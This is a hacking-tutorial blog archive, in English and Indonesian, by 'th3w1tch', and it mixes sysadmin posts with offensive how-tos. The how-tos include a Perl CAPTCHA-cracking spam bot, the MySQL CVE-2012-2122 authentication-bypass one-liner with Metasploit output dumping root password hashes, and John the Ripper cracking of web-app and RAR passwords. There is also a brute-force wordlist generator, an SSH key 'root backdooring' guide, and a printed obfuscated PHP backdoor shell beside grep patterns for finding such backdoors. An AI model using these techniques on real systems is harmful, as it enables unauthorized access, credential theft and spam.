Running Multiple Ports on Apache

Juni 30, 2012

In this tutorial, I will share for all of you about how to run multiple ports on apache. Default of apache runs on port 80, but can also be run apache in another port like 8080. The usefulness of this port can differentiate for several reasons, among others, for security reasons or because of different web applications running on each port. Here are the steps to configure apache to run multiple ports on my slackware machine :

1. Edit file /etc/httpd/httpd.conf

root@th3w1tch:~# nano /etc/httpd/httpd.conf

add additional port, like this

#Listen 12.34.56.78:80
Listen 80
Listen 8081

2. add additional virtual host rule for additional port

NameVirtualHost localhost:80
NameVirtualHost localhost:8081

<VirtualHost localhost:80>
ServerName localhost
DocumentRoot “/srv/httpd/htdocs”
</VirtualHost>

<VirtualHost localhost:8081>
ServerName localhostx
DocumentRoot “/srv/httpd/cgi-bin/project”
<Directory “/srv/httpd/cgi-bin/project”>
AllowOverride None
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
AddHandler cgi-script .cgi
Order allow,deny
Allow from all
</Directory>
<IfModule dir_module>
DirectoryIndex index.cgi
</IfModule>
</VirtualHost>

Here I make use of cgi-bin (perl) to service port 8081 as an example

after the above configuration, restart apache and try to access localhost:8081

Captcha Broke Cracking

Juni 23, 2012

Pada kesempatan kali ini saya akan membahas bagaimana melakukan cracking pada captcha, Setiap orang menyangka ketika situsnya dijaga captcha maka spammer tidak bisa menembusnya,tapi itu salah besar, ketika seseorang membuat captcha asal-asalan maka dengan mudah ditembus,

What is CAPTCHA ?
zz
Captcha yang umumnya berbentuk gambar dan terdapat sebuat kode didalamnya, yang dikhususkan pada manusia agar dapat membacanya, dan komputer akan kesulitan membaca kode dalam gambar itu. Dengan cara ini, hanya manusia yang bisa melanjutkan prosesnya, sedangkan komputer/robot akan gagal.

How to do it ?
OCR (Optical Character Recognition) adalah teknologi untuk mengubah gambar menjadi teks. OCR biasanya dipakai untuk mengubah file gambar dari dokumen yang discan menjadi file teks untuk diolah secara digital.
program yang saya gunakan ini yaitu GNU OCR pada mesin Slackwareku dapat didownload disini

Ok let’s to crack it
example captcha : captcha

root@th3w1tch:#gocr captcha.png
B2LXRWP

Let’s the code with ROBOT

#!/usr/bin/perl
system("wget --cookies=on --load-cookies=xxcookie --keep-session-cookies --save-cookies=xxcookie http://www.example.com/captcha/image.php -O captcha.png");
system("gocr captcha.png > cap.txt");
open (MYFILE, 'cap.txt');
while (<MYFILE>) {
 chomp;
  $crack=$_;
$x="curl -X POST --data 'answer=$crack&submit=true' --referer http://www.example/captcha/image.php -b xxcookie http://www.example.com/captcha/image.php";
}
system($x);
close (MYFILE);
#coding by th3_w1tch
#th3_w1tch@meh.or.id

Silahkan di edit sesuai kebutuhan anda
Thanks

Finding Vulnerabilities & Backdoor PHP Shell Script on a Server

Juni 21, 2012

Grep is a powerful command-line tool in Unix and Linux used for searching and probing data sets for lines that matches a regular expression. As a short history, this utility was coded by Ken Thompson on March 3, 1973 for Unix.
Here is a sample or common usage of the said tool for searching a text string pBot in my php file bot.php:

grep pbot bot.php

Alright let’s proceed on the objective of this article which is to find common vulnerabilities, backdoor shells and other malicious files using the grep command. For this writeup I’m using grep version 2.9 so if you are using a an older version of GNU grep which is below 2.5.4, some of the commands in this article may not work although grep. To determine the version of grep you can just type grep -V or grep –version in your terminal. For the other commands and arguments that can be appended to this command line kung fu, you can also type grep –help for more information.

Common Usage for Finding Vulnerabilities

The very reason why most web applications can be easily hacked or pawned because of insecure codes and functions that can be exploited. Take for example command injection or also known as remote code execution in terms of web exploitation, can be possible to a certain website accepts added strings of characters or arguments; the inputs are used as arguments for executing the command in the web server. And because most vulnerable web applications use the shell_exec function. We can use the grep command to search for the shell_exec in as our advantage in our /var/www directory to check for the possible PHP files that are vulnerable to RCE or command injection. Here is the command:

grep -Rn “shell_exec *( ” /var/www

In the image above, we can see that it displays the path of the vulnerable script and the line of the function.
Another example: the include, require, include_once and require_once functions which are common PHP functions in a vulnerable script that is possible for LFI or Local File Inclusion which is a kind of exploit or vulnerability that allows an attacker to inject directory traversal characters on a certain website.
Again, we can use these functions for searching possible vulnerable scripts in our web server:

grep -Rn “include *(” /var/www

grep -Rn “require *(” /var/www

grep -Rn “include_once *(” /var/www

grep -Rn “require_once *(” /var/www

There are other PHP functions out there that can also be used for finding other web vulnerabilities. Just use Google for other functions
Grepping for Backdoor Shells and other Malicious Files
Backdoors are used by web defacers and hackers to maintain access on the web server which allows them to execute arbitrary commands, download files, edit files, and for back-connection. Most backdoor shells use the shell_exec function for command execution. And because most anti-viruses and rootkit scanners can detect backdoor shells, attackers use PHP encoders for evasion. But because functions like base64_decode and eval are used in this technique, they can’t escape the wrath of grep. Here is a sample backdoor shell that has upload and system information functions only encoded using Carbylamine PHP Encoder:

<?php function KJnPCP($XZK)
{
$XZK=gzinflate(base64_decode($XZK));
for($i=0;$i<strlen($XZK);$i++)
{
$XZK[$i] = chr(ord($XZK[$i])-1);
}
return $XZK;
}
eval(KJnPCP(“U1QEAm4gzkrXzCopSSvVVE3wcAuN0SjJTMvN1YjT0lJMS8ks
0FS2LSxOs1fWBwsnpFWmpaAp1FdWVFfW0le2NQAr1LLBZmhhZiHCyLTypF
zNktLirMKUktwkoDElaMqwmwHSizAEVdCG28GeGwA=”));
?>

Aside from shell_exec, base64_decode, and eval; here are other functions used by PHP backdoor shells:

phpinfo
system
php_uname
chmod
fopen
flclose
readfile
edoced_46esab
passthru
Thus you could also easliy grep these functions:

grep -Rn “shell_exec *(” /var/www

grep -Rn “base64_decode *(” /var/www

grep -Rn “phpinfo *(” /var/www

grep -Rn “system *(” /var/www

grep -Rn “php_uname *(” /var/www

grep -Rn “chmod *(” /var/www

grep -Rn “fopen *(” /var/www

grep -Rn “fclose *(” /var/www

grep -Rn “readfile *(” /var/www

grep -Rn “edoced_46esab *(” /var/www

grep -Rn “eval *(” /var/www

grep -Rn “passthru *(” /var/www

In my recent analysis, some of these functions are used by IRC bots that have malicious functions like vulnerability scanners, automatic backdoor bots, DoS bots, udpflooder bots, etc.

Oh, and you might wanna add tcpflood and udpflood strings for grepping malicious files too because these are commonly used by IRC bots that have udpflood and tcpflood functions.

What you saw from the image above is a sample of a pBot which is a PHP IRC bot used by some attackers to initiate DDoS (Distributed Denial of Service) / DoS (Denial of Service) attacks.

We can also list all these common functions by using this command in your terminal:

grep -RPn “(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile|php_uname|eval|tcpflood|udpflood|edoced_46esab) *\(” /var/www

Source here

MySQL Auth Bypass – CVE-2012-2122

Juni 21, 2012

Introduction

On Saturday afternoon Sergei Golubchik posted to the oss-sec mailing list about a recently patched security flaw (CVE-2012-2122) in the MySQL and MariaDB database servers. This flaw was rooted in an assumption that the memcmp() function would always return a value within the range -128 to 127 (signed character). On some platforms and with certain optimizations enabled, this routine can return values outside of this range, eventually causing the code that compares a hashed password to sometimes return true even when the wrong password is specified. Since the authentication protocol generates a different hash each time this comparison is done, there is a 1 in 256 chance that ANY password would be accepted for authentication.

In short, if you try to authenticate to a MySQL server affected by this flaw, there is a chance it will accept your password even if the wrong one was supplied. The following one-liner in bash will provide access to an affected MySQL server as the root user account, without actually knowing the password.

$ for i in `seq 1 1000`; do mysql -u root –password=bad -h 127.0.0.1 2>/dev/null; done
mysql>

Exploitability

Although a wide range of MySQL and MariaDB versions use the vulnerable code, only some of these systems are exploitable. It boils down to whether the memcmp() routine returns values outside of the unsigned character range. According to Sergei, this is normally not the case, and the routine is normally compiled into the server as an inline function. The major exception is when GCC uses SSE optimization. Joshua Drake, a security researcher with Accuvant Labs, provided a sample application that can determine whether your system might be affected. On most systems, the results of this application match the MySQL package provided by the distribution, but the only way to be sure is to actually test it.

If you’d like to give this a try yourself, download Metasploit now for free.

So far, the following systems have been confirmed as vulnerable:

Ubuntu Linux 64-bit ( 10.04, 10.10, 11.04, 11.10, 12.04 ) ( via many including @michealc )
OpenSuSE 12.1 64-bit MySQL 5.5.23-log ( via @michealc )
Debian Unstable 64-bit 5.5.23-2 ( via @derickr )
Fedora ( via hexed and confirmed by Red Hat )
Arch Linux (unspecified version)

Feedback so far indicates the following platforms are NOT vulnerable:
Official builds from MySQL and MariaDB (including Windows)

Red Hat Enterprise Linux 4, 5, and 6 (confirmed by Red Hat)
CentOS using official RHEL rpms
Ubuntu Linux 32-bit (10.04, 11.10, 12.04, likely all)
Debian Linux 6.0.3 64-bit (Version 14.14 Distrib 5.5.18)
Debian Linux lenny 32-bit 5.0.51a-24+lenny5 ( via @matthewbloch )
Debian Linux lenny 64-bit 5.0.51a-24+lenny5 ( via @matthewbloch )
Debian Linux lenny 64-bit 5.1.51-1-log ( via @matthewbloch )
Debian Linux squeeze 64-bit 5.1.49-3-log ( via @matthewbloch )
Debian Linux squeeze 32-bit 5.1.61-0+squeeze1 ( via @matthewbloch )
Debian Linux squeeze 64-bit 5.1.61-0+squeeze1 ( via @matthewbloch )
Gentoo 64-bit 5.1.62-r1 ( via @twit4c )
SuSE 9.3 i586 MySQL 4.1.10a ( via @twit4c )
OpenIndiana oi_151a4 5.1.37 ( via @TamberP )
FreeBSD 64-bit (many versions)

Most Linux vendors should have a patch out soon, if not already.

Caveats and Defense

The first rule of securing MySQL is to not expose to the network at large in the first place. Most Linux distributions bind the MySQL daemon to localhost, preventing remote access to the service. In cases where network access must be provided, MySQL also provides host-based access controls. There are few use cases where the MySQL daemon should be intentionally exposed to the wider network and without any form of host-based access control.

If you are responsible for a MySQL server that is currently exposed to the network unnecessarily, the easiest thing to do is to modify the my.cnf file in order to restrict access to the local system. Open my.cnf with the editor of your choice, find the section labeled [mysqld] and change (or add a new line to set) the “bind-address” parameter to “127.0.0.1”. Restart the MySQL service to apply this setting.

Real-world Version Information

Pulling from the resources of a personal side project, I was able to derive some statistics about the real-world impact of this vulnerability. This project managed to find and gather the initial handshake for approximately 1.74 million MySQL servers across the internet at large. This statistic only includes MySQL instances that were on hosts publicly exposed to the internet and not bound to localhost.

Host Access Control

Of the 1.74 million MySQL servers identified, slightly more than 50% did not enforce host-based access controls ( 879,046 vs 863,920 ). The data was gathered by scanning randomly generated IPs across the entire addressable IPv4 unicast range, excluding networks known to be “dark” or where the network administrators had opted out of the survey.

MySQL Version Numbers

If we break down the list of accessible servers by version, we can see that the 5.0.x version series accounts for over 356,000 of the entire set, followed by 285,000 running a 5.1.x version, and 134,436 running a 5.5.x version. Doing the same type of analysis on the build flavor highlights how easy it is to identify Ubuntu (43,900), Debian (6,408), and Windows (98,665) MySQL services from the banners alone. Knowing that most Ubuntu 64-bit builds are likely to be vulnerable, the real question is how many of those nearly 44,000 Ubuntu systems are running 64-bit editions of the operating system.

Making the Most of It

If you are approaching this issue from the perspective of a penetration tester, this will be one of the most useful MySQL tricks for some time to come. One feature of Metasploit you should be familiar with is the mysql_hashdump module. This module uses a known username and password to access the master user table of a MySQL server and dump it into a locally-stored “loot” file. This can be easily cracked using a tool like John the Ripper, providing clear-text passwords that may provide further access.

This evening Jonathan Cran (CTO of Pwnie Express and Metasploit contributor) committed a threaded brute-force module that abuses the authentication bypass flaw to automatically dump the password database. This ensures that even if the authentication bypass vulnerability is fixed, you should still be able to access the database using the cracked password hashes. A quick demonstration of this module is shown below using the latest Metasploit Framework GIT/SVN snapshot.

$ msfconsole
msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root
msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1
msf auxiliary(mysql_authbypass_hashdump) > run

[+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test
[*] 127.0.0.1:3306 Authentication bypass is 10% complete
[*] 127.0.0.1:3306 Authentication bypass is 20% complete
[*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts
[+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes…
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89
[*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Source here

Crack Winrar with our uncle JOHN

September 27, 2011

In this tutorial I will share about how to do the cracking of the rar archive file, using JTR (John The Ripper).
Ok immediately on the POC

root@th3w1tch:#john –wordlist=word.lst –rules –stdout | xargs -I jtr unrar e -pjtr xxx.rar

Please wait while smoking until JTR finish the job #lolz
Thank’s

Password Cracking dengan John The Ripper (JTR)

April 21, 2011

Assalamu alaikum Wr. Wb

Ok pada kesempatan ini saya akan sedikit mengupas tentang si Paman John The Ripper (JTR) sang penyelamat dunia. xixixixi :p
JTR merupakan sebuah aplikasi untuk melakukan password cracking. Aplikasi ini dapat berjalan pada platform *NIX, dan WIN. Bagi yang belum mempunyai Aplikasi ini dapat didowload http://www.openwall.com/john/
Aplikasi ini sangat populer, siapa sih yang gak kenal sama paman si JOHN :D. Aplikasi ini sangat membantu bagi seseorang yang biasanya melakukan teknik SQL Injection, Dll karena biasanya password yang ditemukan itu di enkrypt oleh si Admin. apalagi ketika http://www.md5decrypter.co.uk tidak dapat memecahkannya. si JTR lah yang akan berperan disini :

Ok, Langsung saja ke Tekniknya :

1. MD5 Hash
– Contoh MD5 Hash
21232f297a57a5a743894a0e4a801fc3
827ccb0eea8a706c4c34a16891f84e7b
Untuk melakukan Crack
Save MD5 Hash kedalam sebuah file dengan seperti ini

1:21232f297a57a5a743894a0e4a801fc3
2:827ccb0eea8a706c4c34a16891f84e7b

root@th3_w1tch:/pentest/passwords/jtr# ./john -format=raw-md5 pass.txt
12345 (2)
admin (1)
guesses: 2 time: 0:00:00:00 100.00% (2)

Menggunakan Wordlist

root@th3_w1tch:/pentest/passwords/jtr# ./john –wordlist=/data/dict.txt -format=raw-md5 pass.txt

Menggunakan Type Password :
alpha : karakter huruf
digit : karakter angka
alnum : huruf dan angka
all : mencoba semua karakter

root@th3_w1tch:/pentest/passwords/jtr#./john –incremental=alnum –format=raw-md5 pass.txt

2. MD4 Hash

root@th3_w1tch:/pentest/passwords/jtr# ./john -format=raw-md4 pass.txt

3. SHA1 Hash

root@th3_w1tch:/pentest/passwords/jtr# ./john -format=raw-sha1 pass.txt

4. MD5 Jomla Hash
Klw ini sedikit berbeda, karena password joomla memiliki algorima seperti
md5([passwordasli]+[salt]) hasilnya akan seperti ini f9c63438a5fececf0d99355394024f3c:YpSmHvK6ut2306WsORjw3bKAmHKH4eT6
Contoh Joomla Hash
f9c63438a5fececf0d99355394024f3c:YpSmHvK6ut2306WsORjw3bKAmHKH4eT6
Cara Crack :
Save Hashnya seperti ini dalam sebuah file

1:md5_gen(1)f9c63438a5fececf0d99355394024f3c$YpSmHvK6ut2306WsORjw3bKAmHKH4eT6

perhatikan pada saat melakukan save “ : ” diganti menjadi “$“, md5$salt

root@th3_w1tch:/pentest/passwords/jtr#./john –subformat=md5_gen\(1\) pass.txt
Loaded 1 password hash ( md5_gen(1): md5($p.$s) (joomla) [md5-gen SSE2 16×4])
ddddda (1)
guesses: 1 time: 0:00:00:02 (3)

5. WordPress Phpass Hash
contoh Hashnya
$P$937lj8T3rci18KkTykssJJWHrtsVtb/

cara crack :
Save hash diatas dalam sebuah file seperti ini

1:$P$937lj8T3rci18KkTykssJJWHrtsVtb/

root@th3_w1tch:/pentest/passwords/jtr#./john –subformat=md5_gen\(17\) pass.txt

Ok Sekian dulu, Klw Kurang Jelas Silahkan Komennya :D, Semoga bermanfaat

Eksekusi Shell di MySQL

April 19, 2011

Assalamu Alaikum Wr.Wb

Pada system LInux , BSD “MySql” memungkin kita untuk mengeksekusi perintah2 shell command seoerti ls -la, echo, dan beberapa perintah lainnya.
Ok pertama kita koneksikan dulu ke MySQL nya

mysql -u [username] -p [database]

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 206 to server version: 5.0.22

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.

mysql>

Setelah berhasil tersambung, kita akan coba mengeksekusi perintah command shell di MySQL

>mysql>\! ls -l

hasilnya akan terlihat seperti ini

total 26700
drwxr-xr-x 3 root root 4096 2011-04-15 16:58 .
drwxr-xr-x 3 root root 4096 2011-04-16 20:51 ..
drwxrwxr-x 15 root root 4096 2011-04-05 02:24 anoopmenon-opencv-perl-b52785c
-rw-r–r– 1 root root 22379390 2011-04-05 01:34 anoopmenon-opencv-perl-b52785c.tar.gz
-rw——- 1 root root 1675 2011-02-13 01:53 backup-key
-rw-r–r– 1 root root 403 2011-02-13 01:53 backup-key.pub
-rw-r–r– 1 root root 4894720 2011-04-15 16:57 john.tgz
-rw-r–r– 1 root root 1531 2011-03-25 22:54 tutor

mysql> \! nano

mysql> \! vi

dan beberapa perintah lainnya

sekarang kita coba untuk direct ke system shellnya

mysql> \! bash

dan akan terlihat seperti ini

bash-4.1#

Ok cukup sekian tutorialnya, mudah2an dapat bermanfaat bagi kita semua

Membangun Hotspot + DHCP Server

Maret 12, 2011

Assalamu Alaikum Wr.Wb
Ditutorial kali ini saya akan mencoba membangun sebuah hotspot sendiri di Linux dengan Mesin Slackwareku dikarenakan kebutuhan akan jaringan Wireless semakin meningkat. Hotspot yang saya bangun ini sangatlah simple karena tidak menggunakan user database.
Untuk aplikasi Hotspotnya saya menggunakan Hostapd (dapat dicari di slackbuild.org) dan DHCPD untuk DHCP Servernya
Ok langsung saja, siapkan alat dan bahan 😀
1. Kopi Cappucino + Sampoerna. 😀 hahahahaha
2. Silahkan Download dulu aplikasi Hostapd di disini, kemudian installnya aplikasinya

root@th3w1tch:~#wget http://hostap.epitest.fi/releases/hostapd-0.6.10.tar.gz

root@th3w1tch:~#wget http://slackbuilds.org/slackbuilds/13.1/network/hostapd.tar.gz

root@th3w1tch:~#tar -xzvf hostapd.tar.gz

root@th3w1tch:~#mv hostapd-0.6.10.tar.gz hostapd/

root@th3w1tch:~#cd hostapd/

root@th3w1tch:~/hostapd#./hostapd.Slackbuild

3. Konfigurasi Hostapd
Edit file /etc/hostapd/hostapd.conf, saya menggunakan konfigurasi sebagai berikut, sesuaikan keinginan anda :

interface=wlan0
driver=nl80211
ssid=coconut
country_code=ID
hw_mode=g
channel=1
auth_algs=1
ignore_broadcast_ssid=0
wpa=3
wpa_passphrase=coconut123
wpa_pairwise=TKIP
rsn_pairwise=CCMP

4. Konfigurasi DHCP Server
Edit file /etc/dhcpd.conf, saya menggunakan konfigurasi sebagai berikut: sesuaikan DNS dan IP yang anda gunakan.

# dhcpd.conf
#
# Configuration file for ISC dhcpd (see 'man dhcpd.conf')
#
option domain-name-servers 8.8.8.8;
default-lease-time 600;
max-lease-time 7200;
ddns-update-style none; ddns-updates off;
subnet 192.168.0.0 netmask 255.255.255.0 {
        range 192.168.0.200 192.168.0.229;
        option subnet-mask 255.255.255.0;
        option broadcast-address 192.168.0.255;
        option routers 192.168.0.1;
}

4. Membuat Program Bash, untuk start dan stop Hotspot service.

root@th3w1tch:~#nano /etc/rc.d/rc.hotspot

#!/bin/sh
IPTABLES=/usr/sbin/iptables
IFCONFIG=/sbin/ifconfig
DHCPD=/usr/sbin/dhcpd
HOSTAPD=/usr/sbin/hostapd

intwlan0=wlan0
internet=ppp0
ip=192.168.0.1

case "$1" in
start)
        echo "Starting $intwlan0 at ip address $ip"
        echo 0 &gt; /proc/sys/net/ipv4/ip_forward
        killall hostapd
        killall dhcpd
        $IPTABLES -t nat -A POSTROUTING -o $internet -j MASQUERADE
        $IPTABLES -A FORWARD -i $internet -o $intwlan0 -m state \
--state RELATED,ESTABLISHED -j ACCEPT
        $IPTABLES -A FORWARD -i $intwlan0 -o $internet -j ACCEPT
        echo 1 &gt; /proc/sys/net/ipv4/ip_forward
        $IFCONFIG $intwlan0 down
        $IFCONFIG $intwlan0 up
        $IFCONFIG $intwlan0 $ip
        if [ ! -f /var/state/dhcp/dhcpd.leases ]; then
                touch /var/state/dhcp/dhcpd.leases
        fi
        $DHCPD -cf /etc/dhcpd.conf $intwlan0
        $HOSTAPD -B -P /var/run/hostapd.pid /etc/hostapd/hostapd.conf
        ;;
stop)
        echo "Stopping $intwlan0"
        kill -INT $(cat /var/run/hostapd.pid)
        kill -INT $(cat /var/run/dhcpd.pid)
	iptables -F
	iptables -Z
	iptables -X
	iptables -t nat -F
	iptables -t nat -X
	iptables -t nat -Z
        ;;
*)
        echo "Usage: $0 {start|stop}"
        exit 1
        ;;
esac

Perhatikan Kode diatas, sesuaikan interface yang terkoneksi internet, saya menngunakan interface ppp0

5. Rubah Permision File yang kita buat, kemudian jalankan

root@th3w1tch:~#chmod +x /etc/rc.d/rc.hotspot

root@th3w1tch:~#/etc/rc.d/rc.hotspot start

6. Silahkan Scan wirelesnya ke komputer Client. dan silahkan berhotspot ria 😀

——————————————-end—————————————
catatan:
– Jika ingin Hotspotnya aktif setiap Komputer boot :
edit file /etc/rc.d/rc.local, tambahkan baris ini :

  if [ -x /etc/rc.d/rc.hotspot ]; then
  /etc/rc.d/rc.hotspot start
  fi
 

– Jika anda ingin membuat sebuah halaman Login hotspot dengan user database, mainkan IPTABLES nya :
Redirect Semua paket melalui port 80 menuju webserver lokal

root@th3w1tch:~#iptables -t nat -A PREROUTING -s 192.168.0.0/24 -p tcp -m tcp –dport 80 -j REDIRECT –to-port 80

Pada webserver diletakkan halaman login untuk user WLAN, setelah user melakukan login, lakukan INSERT pada tabel FORWARD dan PREROUTING. Perintah ini bisa dilakukan oleh eksekusi php dan perl dalam lingkungan shell dari webserver. Misalkan buat shell script seperti berikut untuk membuka ip agar bisa berinternet.

#!/bin/bash
# file buka.sh
iptables -A FORWARD -s $1 -i wlan0 -o ppp0 -d 0.0.0.0/0 -j ACCEPT
iptables -A FORWARD -s 0.0.0.0/0 -i ppp0 -o wlan0 -d $1 -j ACCEPT
iptables -t nat -I PREROUTING -s $1 -p tcp -m tcp --dport 80 -d 0/0 -j RETURN

Sedangkan untuk menutup ip agar tidak bisa berinternet kita buat shell script seperti berikut:

#!/bin/bash
# file tutup.sh
iptables -A FORWARD -s $1 -i wlan0 -o ppp0 -d 0.0.0.0/0 -j ACCEPT
iptables -A FORWARD -s 0.0.0.0/0 -i ppp0 -o wlan0 -d $1 -j ACCEPT
iptables -t nat -D PREROUTING -s $1 -p tcp -m tcp --dport 80 -d 0/0 -j RETURN

Pastikan webserver utama adalah script login untuk pengguna hotspot tersebut.
Contoh penggunaan buka.sh dan tutup.sh, misalkan pada pengguna hotspot diberi IP 192.168.0.202 maka, setelah pengguna melakukan login, otomatis akan mengeksekusi perintah:
/path/buka.sh 192.168.0.202

Setelah selesai dan ingin menutup koneksi dari pengguna gunakan eksekusi tutup.sh
/path/tutup.sh 192.168.0.202

Silahkan Bereksperimen
Sekian dan Terima Kasih, Mudah-mudahan dapar bermanfaat. Mohon Maaf jika ada kesalahan. Silahkan Kritik dan Sarannya :

SSH Login Via RSA Key (Root Backdooring Bag-2)

Februari 12, 2011

Tutorial ini ada sebuah alternatif Login dengan SSH dengan menggunakan RSA Key, atau dapat di gunakan Login SSH tanpa password dengan menggunakan RSA key SSH. Ok cukup dech basa-basinya. Langsung Ke tekniknya :

root@th3_w1tch:~# ssh-keygen -t rsa -b 2048 -f my-key

Perintah diatas akan menciptakan 2 buah file yaitu
my-key dan my-key.pub

Kemudian masuk ke direktori /root/.ssh

root@th3_w1tch:~#cd /root/.ssh

Buat File authorized_keys

root@th3_w1tch:~#touch authorized_keys

copy isi dari file my-key.pub ke authorized_keys

root@th3_w1tch:~#cat my-key.pub >> authorized_keys

Kemudian Copy file my-key dan my-key.pub tersebut ke client, atau dapat menggunakan transfer via scp dengan perintah

root@th3_w1tch:~#scp my-key my-key.pub user@remotehost:~/home/user/

kemudian rubah permisionnya

client@th3_w1tch:~#chmod 600 my-key my-key.pub

Sekaran Login Ke Server dengan Perintah

client@th3_w1tch:~#ssh -i my-key root@remotehost

Tradaaaa Login SSH Succesfull

Terima Kasih, semoga tutorial ini bermanfaat 😀

refrensi : disini

Dictionary Password Generator for Brute Force

Januari 14, 2011

Kemarin Sempat Coding Bruteforce dengan methode dictionary attack, kata orang sih kurang garam bruteforce nya tanpa wordlist yang banyak, ok dengan membutuhkan sedikit logika maka wordlistnya akan jadi seketika dan siap saji (Kyak makanan saja :p). hehehehe
ok tudopoin langsung ke codingnya berikut :

#!/usr/bin/perl
system ('clear');
print q(
###############################################################
#               Dictionary Password Generator 	              #
###############################################################
);
print q(
Note :
k= Lowarcase [a-z]
B= Upper case [A-Z]
a= Number [0-9]
c= Character Special);
print "\n";
print "\n[-]Input Dictionary Type [k/B/a/c]: ";
$type=<STDIN>;
chomp($type);
print "[-]Input Min Length: ";
$k=<STDIN>;
chomp($k);
print "[-]Input Max Length: ";
$p=<STDIN>;
chomp($p);
print "Starting Dictionary Password . . . .\n";
if ($type=~"k") {$char = "abcdefghijklmnopqrstuvwxyz";}
if ($type=~"B") {$char = $char. "ABCDEFGHIJKLMNOPQRSTUVWXYZ";}
if ($type=~"a") {$char = $char."1234567890";}
if ($type=~"c") {$char = $char. "!\"\$%&/()=?-.:\\*'-_:.;,";}
sub generator{
 @tampung = (); 
 $shift = shift;
 for ($i =0;$i<$shift;$i++){ $tampung[i] = 0;}
 do{
  for ($i =0;$i<$shift;$i++){
   if ($tampung[$i] > length($char)-1){
      if ($i==$shift-1){
        $a=0;
        return false;
        print "Finish, Check File dictionary.txt\n";
       }
      $tampung[$i+1]++;
      $tampung[$i]=0;
   }
  }
   $pass = "";	
   for ($i =0;$i<$shift;$i++){ $pass = $pass . substr($char,$tampung[$i],1);}
   open (FILE, '>>dictionary.txt');
   print FILE "$pass\n";
   close (FILE);
   $a++;
   $tampung[0]++;
 }while($tampung[$shift-1]<length($char));
}
for ($x=$k;$x<=$p;$x++){
 generator($x);
}
#th3w1tch

Save Code diatas dengan mehdictionary.pl kemudian jalankan di konsole

perl mehdictionary.pl

Thank’s Semoga Bermanfaat, Enjoy Your Hack.